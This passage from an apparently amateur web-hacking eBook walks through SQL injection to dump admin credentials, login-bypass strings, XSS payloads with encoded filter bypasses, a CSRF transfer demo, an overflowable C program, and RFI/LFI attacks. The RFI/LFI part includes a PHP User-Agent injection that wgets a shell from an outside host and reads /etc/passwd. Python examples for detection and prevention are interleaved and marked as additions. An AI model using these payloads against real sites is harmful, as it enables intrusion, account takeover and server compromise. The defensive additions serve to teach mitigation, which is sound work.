(There is another way for that, char(58), the ASCII value for :)
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password on the screen, i.e. admin:admin or admin:encrypted hash. When you have the username and password, you can log in as admin or some superuser.
6). MySQL 5
As I said before, I'm going to explain how to get table and column names in MySQL >= 5.
For this we need information_schema. It holds all tables and columns in the database.
To get tables we use table_name and information_schema.tables, i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables, i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note that I put 0,1 (get 1 result starting from the 0th). Next we move on to limit 1,1, i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table is displayed. For the third table we put limit 2,1, i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user, etc.
To get the column names the method is the same; here we use column_name and information_schema.columns. So an example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is displayed. For the second one we change limit 0,1 to limit 1,1, i.e.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column is displayed, so keep incrementing until you get something like username, user, login, password, pass, passwd, etc.
If you want to display the column names for a specific table, use a WHERE clause. Let's say that we found the table users, i.e.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get a column name from the table users displayed. Just using LIMIT we can list all columns in the table users.
Note that this won't work if magic quotes are ON (the quotes around 'users' get escaped).
Let's say that we found the columns user, pass and email. Now, to complete the query and put them all together, we use concat(), which I described earlier, i.e.
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
What we get here is user:pass:email from the table users. Example: admin:hash:[email protected]
After getting all the credentials you can log in to the admin panel. Commonly admin panels are located at
/login.ext (where ext is the platform on which the website is made, like php, asp, etc.)
/admin.ext
/adminlogin.ext
Or you can use Google dorks or find it online using an online admin panel scanner like
http://scan.subhashdasyam.com/admin-panel-finder.php
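From the defender's side, the probing sequence walked through in this section (ORDER BY column counting, UNION SELECT, @@version, information_schema) leaves a recognisable trail in the web server access log. The following Python scan is an added example, not code from the eBook; the log lines, IP addresses and timestamps are constructed for it.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format lines (IPs, dates and sizes are made up).
# They replay the steps above: column count probe, version fingerprint and
# information_schema enumeration, with a normal visitor mixed in.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2013:10:01:02 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2013:10:01:09 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 500 311
203.0.113.7 - - [10/Mar/2013:10:01:15 +0000] "GET /news.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 5204
203.0.113.7 - - [10/Mar/2013:10:01:40 +0000] "GET /news.php?id=5+union+all+select+1,table_name,3+from+information_schema.tables+limit+0,1/* HTTP/1.1" 200 5230
198.51.100.4 - - [10/Mar/2013:10:02:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 5010
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# One pattern per step of the walkthrough above.
PROBES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version_fingerprint", re.compile(r"@@version|\bversion\s*\(", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("mysql_comment_tail", re.compile(r"/\*\s*$|--\s*$")),
]

def classify_request(path):
    """Return the probe labels matched by any decoded query-string value."""
    hits = []
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        decoded = unquote_plus(value)  # second pass catches double-encoded values
        for label, pattern in PROBES:
            if label not in hits and pattern.search(decoded):
                hits.append(label)
    return hits

def scan_log(text):
    """(ip, status, labels) for every log line that matches at least one probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify_request(m.group("path"))
        if labels:
            findings.append((m.group("ip"), int(m.group("status")), labels))
    return findings

def suspicious_ips(text, min_probe_types=2):
    """IPs that used several distinct probe types: one hit may be noise, a sequence is enumeration."""
    seen = {}
    for ip, _, labels in scan_log(text):
        seen.setdefault(ip, set()).update(labels)
    return sorted(ip for ip, kinds in seen.items() if len(kinds) >= min_probe_types)
```

The 500 status on the ORDER BY line is the "Unknown column" error from step 2 surfacing server side; pairing that with a later UNION from the same address is a stronger signal than either line alone.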
Authentication Bypass
As the name implies, it is a flaw in badly coded web apps which allows direct access to the backend of a web app without any valid credentials. By inputting some malicious strings we can get access to the backend. Here are some special strings:
'or''='
'or''1=1--
admin'--
admin' or '1'='1--
admin' or '1'='1'--
admin'or 1=1 or ''='
admin' or 1=1--
admin') or (
admin') or '1'='1--
Let's take a form which takes a username & password and builds this query:
SELECT * FROM Users WHERE Username='$User' AND Password='$Pass'
Let user = 1'='1'-- and pass = 1'='1'--. The query becomes
SELECT * FROM Users WHERE Username='1'='1'-- AND Password='1'='1'--
Since we know 1 is always equal to 1, it will get executed & authenticate the user without knowing the actual username & password. -- means comment; it tells the database not to execute the remainder. Thus anything after the -- will be neglected & will not be executed.
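The root cause is that the form values are pasted into the SQL text. As an added example (not from the eBook), the login query above is built both ways in Python against an in-memory SQLite table of constructed users, and the special strings from this section are tried against each; the table, the passwords and the use of SQLite in place of MySQL are assumptions of the example.

```python
import hashlib
import sqlite3

# Constructed user table (in-memory SQLite stands in for the site's database).
USERS = [("admin", "S3cret!"), ("ubaid", "hunter2")]

def digest(password):
    """Demo only: real storage uses a salted, slow hash (bcrypt/scrypt/Argon2)."""
    return hashlib.sha256(password.encode()).hexdigest()

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?)", [(u, digest(p)) for u, p in USERS])
    return db

def login_vulnerable(db, user, password):
    """The eBook's query built by string substitution: the username becomes part of
    the SQL, so -- comments out the password check and or '1'='1' matches every row."""
    query = ("SELECT Username FROM Users WHERE Username='%s' AND Password='%s'"
             % (user, digest(password)))
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error:  # payloads that break the syntax simply fail to log in
        return None
    return row[0] if row else None

def login_safe(db, user, password):
    """Same query with bound parameters: the input is only ever compared as data."""
    row = db.execute("SELECT Username FROM Users WHERE Username=? AND Password=?",
                     (user, digest(password))).fetchone()
    return row[0] if row else None

# Username-field strings quoted in the section above.
PAGE_STRINGS = ["admin'--", "admin' or '1'='1'--", "admin' or 1=1--"]

def compare(db):
    """{payload: (who the vulnerable login admits, who the safe login admits)}"""
    return {s: (login_vulnerable(db, s, "wrong"), login_safe(db, s, "wrong"))
            for s in PAGE_STRINGS}
```

With the wrong password, every listed string logs in as admin through login_vulnerable and as nobody through login_safe.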
XSS
XSS or Cross Site Scripting is one of the biggest security flaws in web applications; it allows an attacker to steal cookies, redirect to malicious pages, etc. This vulnerability has affected all types of websites, from Google to Facebook. It is a type of vulnerability which allows an attacker to inject malicious code into the web app. When talking of XSS we think of JavaScript, but it's not only JavaScript: it can be HTML or XML as well as JavaScript. It is caused by poor coding: when developers don't filter special symbols like ">", "\"" and "/", an attacker can take advantage of it. Malicious strings can be inserted into the page by tampering with the URL, search fields, input fields, comment boxes, etc. A common XSS script looks like this:
<script>alert("root@localhost:~#")</script>
XSS is of three types:
a) Non-Persistent b) Persistent c) DOM based
a) Non-Persistent: It is a kind of XSS which works only for a short time; it is commonly executed through an HTTP query or form submission. It is also called reflected XSS.
A non-persistent XSS could look like this:
http://vulnerablesite.tld/index.php?parameter=<script>alert("XSS")</script>
b) Persistent: It is a kind of XSS in which the malicious script is stored in the web app permanently, so whenever a user tries to view the page the script gets executed. A common example is a comment box: when an attacker inserts some malicious script into the comment field it gets saved into the web app permanently. If that comment box doesn't sanitize requests, the script gets executed every time a user visits the page containing that comment box. It is also called stored XSS.
A persistent XSS could look like this:
<script src=http://evilsite.tld/maliciouspage.js></script>
c) DOM based: It is also called type-0 XSS; it occurs by modifying the DOM environment of the browser. The client side is responsible for this attack, whereas in reflected & stored XSS the server-side code is responsible. The server-side response doesn't change, but the client-side code runs in a different manner.
Many sites are vulnerable but don't execute the code because developers filter special symbols; however, these filters can be bypassed by encoding the payload using various techniques like hex, char code, ASCII, etc.
After encoding, the malicious code looks like this:
Source string: <script>alert("XSS")</script>
URL: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
HTML value (with semicolons): <script>&#x61;lert("X&#x53;S")</sc&#x72;ipt>
HTML value (without semicolons): <script>a&#108ert("XSS")</script>
Base64: PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
Demo XSS using an XML file:
<root xmlns="http://non.existe.ent/namespace">
<script xmlns="http://www.w3.org/2000/svg"><![CDATA[ document.location="http://evilsite.com"; ]]></script>
</root>
Impact of XSS:
Remotely control the browser.
Spread worms, malware, etc.
Redirect to malicious pages.
Steal cookies and thus hijack accounts.
Exploit the browser.
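The encoded forms above defeat a filter that only looks at the raw input, which is why the fix is to decode before inspecting and, more importantly, to escape at output time. The Python below is an added example (not from the eBook): it peels the URL, HTML entity and Base64 layers listed in this section back to the source string, and shows the comment-box output escaping that stops the stored case; the constant names and the comment markup are assumptions of the example.

```python
import base64
import binascii
import html
import re
from urllib.parse import unquote

PAYLOAD = '<script>alert("XSS")</script>'
# Encoded forms from the section above (URL form with its line-wrap spaces removed).
URL_FORM = "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E"
ENTITY_FORM = '<script>&#x61;lert("X&#x53;S")</sc&#x72;ipt>'
ENTITY_NOSEMI_FORM = '<script>a&#108ert("XSS")</script>'
BASE64_FORM = "PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4="

B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
SCRIPT_RE = re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.I)

def decode_layers(value, max_rounds=4):
    """Peel percent-, entity- and base64-encoding until the value stops changing,
    so a filter compares what the browser would actually see."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value and B64_RE.match(value):
            try:
                decoded = base64.b64decode(value, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                decoded = value
        if decoded == value:
            break
        value = decoded
    return value

def contains_script(value):
    """True if the decoded input carries a script tag, javascript: URL or event handler."""
    return bool(SCRIPT_RE.search(decode_layers(value)))

def render_comment(author, text):
    """The fix for the comment-box (stored) case: escape at output time, in both the
    attribute and the text context, instead of trying to filter input."""
    return '<div class="comment" data-author="%s">%s</div>' % (
        html.escape(author, quote=True), html.escape(text, quote=True))
```

Note that decoding is only ever an aid to detection: the browser applies the same decoding, so escaping on output is what actually prevents execution.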
CSRF
CSRF or Cross Site Request Forgery is one of the most dangerous vulnerabilities in web apps. In CSRF a victim is forced to execute some HTTP request in order to perform some action. The only requirements are that the victim must be logged in at that time & a little bit of social engineering. It is very easy to exploit a CSRF vulnerability & it can have a very critical impact. It is commonly executed using an image tag or an iframe.
Demo of CSRF
<img src="http://anonymousbank.com/transfer?account=John&amount=9999999999&recipient=Ahmad">
<iframe src="http://anonymousbank.com/transfer?account=John&amount=9999999999&recipient=Ahmad"></iframe>
As you can see above, when these pieces of code are embedded in a web page & John is forced to open that page, it will transfer 9999999999 from the account of John to Ahmad.
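The transfer goes through because the bank trusts the session cookie alone. As an added example (not from the eBook), here is a Python sketch of the server-side checks that make the demo request fail: a state change only on POST, an Origin/Referer that matches the site, and a per-session synchronizer token; the site origin, the handler and the balances are constructed.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "https://anonymousbank.com"   # the eBook's example bank, constructed origin
FORGED_SRC = "http://anonymousbank.com/transfer?account=John&amount=9999999999&recipient=Ahmad"

def issue_token(session):
    """Synchronizer token: random per session, stored server side, echoed in every form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def csrf_check(session, method, headers, form):
    """Return (ok, reason). The <img>/<iframe> demo above is a cross-origin GET with no
    token, so it already fails at the first check."""
    if method.upper() != "POST":
        return False, "state-changing action must be a POST"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin/Referer to verify"
    src, site = urlsplit(source), urlsplit(SITE_ORIGIN)
    if (src.scheme, src.netloc) != (site.scheme, site.netloc):
        return False, "cross-origin request"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"

def transfer(session, method, headers, form, balances):
    """The /transfer handler guarded by csrf_check; returns the refusal reason or 'transferred'."""
    ok, reason = csrf_check(session, method, headers, form)
    if not ok:
        return reason
    amount = int(form["amount"])
    balances[form["account"]] -= amount
    balances[form["recipient"]] = balances.get(form["recipient"], 0) + amount
    return "transferred"

def forged_params():
    """The parameters the demo's <img src> sends, as the browser would submit them."""
    return {k: v[0] for k, v in parse_qs(urlsplit(FORGED_SRC).query).items()}
```

Marking the session cookie SameSite=Lax gives a second, browser-enforced layer, but the token check is the one the application controls.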
Buffer Overflow
Here comes the real part. Buffer overflow is the vulnerability where a program tries to write more data into a buffer in memory than it is capable of holding, thus making it write into adjacent memory and overwriting the data stored there. The extra data can contain some malicious code which can trigger some malicious action. By buffer overflow an attacker can get partial or full control over the victim's machine. Later he can add backdoors on the victim's machine for further action & can use the victim's system as a bot. It is one of the deadliest attacks. Exploitation varies between heap-based and stack-based memory.
Buffer overflow demo (thanks to Passwdatt)
/*
This program is a good example of a buffer overflow attack that corrupts data (the password) without modifying the address of the variable that stores it. The program accepts a user name as input and loads the stored encrypted password into a buffer. When the user enters a password that is longer than 8 characters, it overwrites the system password, thus creating a window of opportunity for a hacker to break into the system.
The valid usernames and passwords can be found in the init_list function. The program uses a Caesar cipher where the shift is 3. For example a,b,c will be d,e,f and so on, and x,y,z will be a,b,c.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>   /* getch(): this is a Windows (MSVC/MinGW) program, see system("pause") below */

#define MAXLENGTH 8    // how long the username/password should be. For a unix system, the length is 8.
#define LISTLENGTH 5   // increase this if more users are added to this system.

/* Structure used to store the list of user names and their corresponding passwords.
   More names can be added by increasing the array length. */
struct usrlst {
    char *unames[10];
    char *passwd[10];
};

// Function prototypes
void init_list(struct usrlst *u);
int get_indx(char *pch, struct usrlst *u);
void encode_passwd(const char *s, char *r);

/* The main program. */
int main(void) {
    struct usrlst usr;
    int i = 0, pass_indx = -2;
    char ch_tmp = '\0';
    // keep the length of each string one greater than MAXLENGTH to accommodate the '\0' at the end.
    // The four strings are adjacent in memory, which is what makes the overflow below useful.
    char buffer[4][MAXLENGTH + 1];
    char *usrname = buffer[0], *usrpasswd = buffer[1];
    char *sys_enc_pass = buffer[2], *usr_enc_pass = buffer[3];
    //printf("<%p>,<%p>,<%p>,<%p>\n", &usrname[0], &usrpasswd[0], &sys_enc_pass[0], &usr_enc_pass[0]);
    printf("Password table is shown as below:\n");
    printf("Username \t\t Password \t Encrypted Password\n");
    printf(" joe \t\t\t ilovemsu \t\t loryhpvx\n");
    printf(" bob \t\t\t manitoba \t\t pdqlwred\n");
    printf(" john \t\t\t inbombay \t\t lqerpedb\n");
    printf(" marc \t\t\t hiobiwan \t\t klrelzdq\n");
    printf(" alice \t\t cometous \t\t frphwrxv\n");
    init_list(&usr);
    printf("Please enter your username (lowercase): ");
    gets(usrname);   // unbounded read into a 9-byte buffer: the first overflow in this program
    if (strlen(usrname) > 0)
        pass_indx = get_indx(usrname, &usr);
    else
        printf("You entered an invalid username.\nPlease try again.\nGoodbye!!\n");
    if (pass_indx >= 0) {
        strcpy(sys_enc_pass, usr.passwd[pass_indx]);
        //printf("The sys passwd is: %s\n", sys_enc_pass);
        printf("Please enter the password for user %s: ", usrname);
        ch_tmp = '\0'; i = 0;
        for (;;) {
            ch_tmp = getch();
            if (i == MAXLENGTH) {
                // terminates usrpasswd but keeps reading: from the 9th character on, input lands
                // in sys_enc_pass (buffer[2]), which is the overwrite the text above describes.
                usrpasswd[i] = '\0';
                i++;
            }
            if (ch_tmp == '\r') {
                printf("\n");
                break;
            }
            usrpasswd[i] = ch_tmp;
            //putchar(ch_tmp);   // uncomment this if you want to echo the password on the screen
            putchar('*');        // comment this if you want to see the password instead of *
            i++;
        }
        //printf("The password you entered is: %s\n", usrpasswd);
        encode_passwd(usrpasswd, usr_enc_pass);
        printf("<%s>,<%s>,<%s>,<%s>\n", usrname, usrpasswd, sys_enc_pass, usr_enc_pass);
        if (!strcmp(usr_enc_pass, sys_enc_pass))
            printf("Thank you, your password has been accepted.\nWelcome!!\n");
        else
            printf("Sorry, your password was not accepted.\nPlease try again.\nGoodbye!!\n");
    }
    system("pause");
    return 0;
}

/* Encrypt the user-entered password and return the Caesar cipher text. The substitution simply
   replaces a letter with the letter standing three places down the alphabet.
   Also note that the replacement letters wrap around, viz. z->c */
void encode_passwd(const char *s, char *r) {
    int i, ch;
    for (i = 0; i < MAXLENGTH; i++) {
        ch = s[i] + 3;
        if (ch > 122) ch -= 26;   // past 'z': wrap back to the start of the alphabet
        r[i] = ch;
    }
    r[MAXLENGTH] = '\0';
}

/* Check if the username exists in the database. If it does, get the index of its
   corresponding password. Return -1 if the username is not found. */
int get_indx(char *pch, struct usrlst *u) {
    int i;
    for (i = 0; i < LISTLENGTH; i++)
        if (!strcmp(pch, u->unames[i]))
            break;
    if (i < LISTLENGTH)
        return i;
    printf("The username %s not found in database.\nPlease try again.\nGoodbye!!\n", pch);
    return -1;
}

/* Store all the usernames and passwords in the usrlst structure. */
void init_list(struct usrlst *u) {
    u->unames[0] = "joe";   u->passwd[0] = "loryhpvx";   // ilovemsu
    u->unames[1] = "bob";   u->passwd[1] = "pdqlwred";   // manitoba
    u->unames[2] = "john";  u->passwd[2] = "lqerpedb";   // inbombay
    u->unames[3] = "marc";  u->passwd[3] = "klrelzdq";   // hiobiwan
    u->unames[4] = "alice"; u->passwd[4] = "frphwrxv";   // cometous
}
RFI
It's not only input validation attacks which can damage a server; believe me, RFI can do it too with the same ease. It is a vulnerability which allows an attacker to remotely include files on a server. It is easier than SQL injection. After uploading a shell an attacker can root the server, deface websites hosted on it, steal the source code of websites, etc.
Demo of RFI
http://vulnerablesite.com/index.php?page=http://evilsite.com/shell.php
If the site opens an iframe on the current page then the website is vulnerable.
Things needed:
• Shell
• A web host which will host your shell
• If the application automatically adds an extension to the file, then we must use a null byte "%00" (without quotes) to avoid any error:
http://vulnerablesite.com/index.php?page=http://evilsite.com/shell.php%00
Otherwise our request would become like below, which is incorrect:
http://vulnerablesite.com/index.php?page=http://evilsite.com/shell.php.php
Impacts of RFI:
• Remote code execution on a web server
• Code execution on the client side
• Document hijacking, including the database it is stored on
• Source code theft
• DDoS
LFI
LFI or Local File Inclusion is the opposite of RFI: in LFI, files on the server are included rather than remote files as in RFI. In LFI an attacker can view as well as execute a local file on the server. After successfully exploiting an LFI vulnerability an attacker can execute remote code on the machine.
On a Unix based server one can get hold of some important files like /etc/passwd, /etc/shadow, /etc/release, /proc/self/environ, etc.
Some of the important files which an attacker can get on a Windows based machine:
\boot.ini, \php.ini, \Program Files\Apache Software Foundation\Apache\conf\logs\access.log, \Program Files\Apache Software Foundation\Apache\conf\logs\error.log, etc.
The vulnerable URL looks like this:
http://www.vulnerablesite.com/index.php?page=../../../../../etc/passwd
or using a null byte if it adds a file extension automatically:
http://www.vulnerablesite.com/index.php?page=../../../../../etc/passwd%00
(List of system accounts, username & hashes from /etc/passwd)
After finding a vulnerable site an attacker can execute code on the machine using a user agent changer. You can use any User Agent Changer with an easy GUI. An attacker changes the User Agent to the code which he wants to get executed; the value is written into files such as the access log or /proc/self/environ listed above, which the LFI then includes. In the example below the attacker enters the following code:
<?exec('wget http://www.shellsite.tld/shell.txt -O shell.php');?>
This code fetches the shell (hosted as shell.txt) & saves it on the server as shell.php.
Open Redirection
These vulnerabilities affect parameters of an application which redirect a user to a different website without validation.
This can cause a serious privacy threat to the user. An attacker can redirect a user to a phishing page or a specially crafted malicious page containing malware and thus control the victim's PC remotely. An attacker can exploit this vulnerability like this:
http://securesite.com/index.php?page=http://evilsite.tld
When a victim clicks on this URL, the victim will be redirected to http://evilsite.tld without any validation. Thus an attacker can hijack accounts, install malware, redirect to phishing pages, etc. This vulnerability is featured in many bug bounty programs & the payout is from $300 to $500 & even more.
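The RFI, LFI and Open Redirection sections all abuse the same kind of page= parameter, so one piece of server-side validation covers all three. The Python below is an added example (not from the eBook), run against the URLs quoted in those sections; the web root, the page list and the allowed redirect hosts are constructed.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed stand-ins for the eBook's index.php?page=... handler.
WEB_ROOT = "/var/www/site/pages"
ALLOWED_PAGES = {"home", "news", "contact"}
REDIRECT_HOSTS = {"securesite.com", "www.securesite.com"}

def resolve_include(page_param):
    """Map ?page= to a file under WEB_ROOT; None for anything that is not a listed page name."""
    value = unquote(page_param)
    if "\x00" in value:                 # the %00 trick used in the RFI and LFI sections
        return None
    if urlsplit(value).scheme:          # http://evilsite.com/shell.php: the RFI case
        return None
    if value not in ALLOWED_PAGES:      # ../../../../../etc/passwd and every other path
        return None
    path = posixpath.normpath(posixpath.join(WEB_ROOT, value + ".php"))
    # Belt and braces: even a listed name must resolve inside the web root.
    return path if path.startswith(WEB_ROOT + "/") else None

def safe_redirect(target):
    """Follow only same-site relative paths or allowlisted hosts; otherwise send the user home."""
    value = unquote(target)
    parts = urlsplit(value)
    if (not parts.scheme and not parts.netloc and value.startswith("/")
            and not value.startswith("//") and "\\" not in value):
        return value                    # relative path on our own site
    if parts.scheme in ("http", "https") and parts.hostname in REDIRECT_HOSTS:
        return value
    return "/"                          # http://evilsite.tld, //evilsite.tld, javascript: all land here
```

An allowlist of page names removes the need to reason about traversal, null bytes or remote URLs at all; the normpath check only exists as a second line of defence.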
About
This book has been written by Ubaid aka $cr1pt Kid33, founder & designer of xedlgubaid.blogspot.com. This book has been written to raise awareness about the latest security threats. The author has been acknowledged by PayPal Inc. & has found many security vulnerabilities in various internet giants. Feel free to contact the author at
mailto:[email protected]
“Thanks To All those who said no, it’s only because of them I did it myself”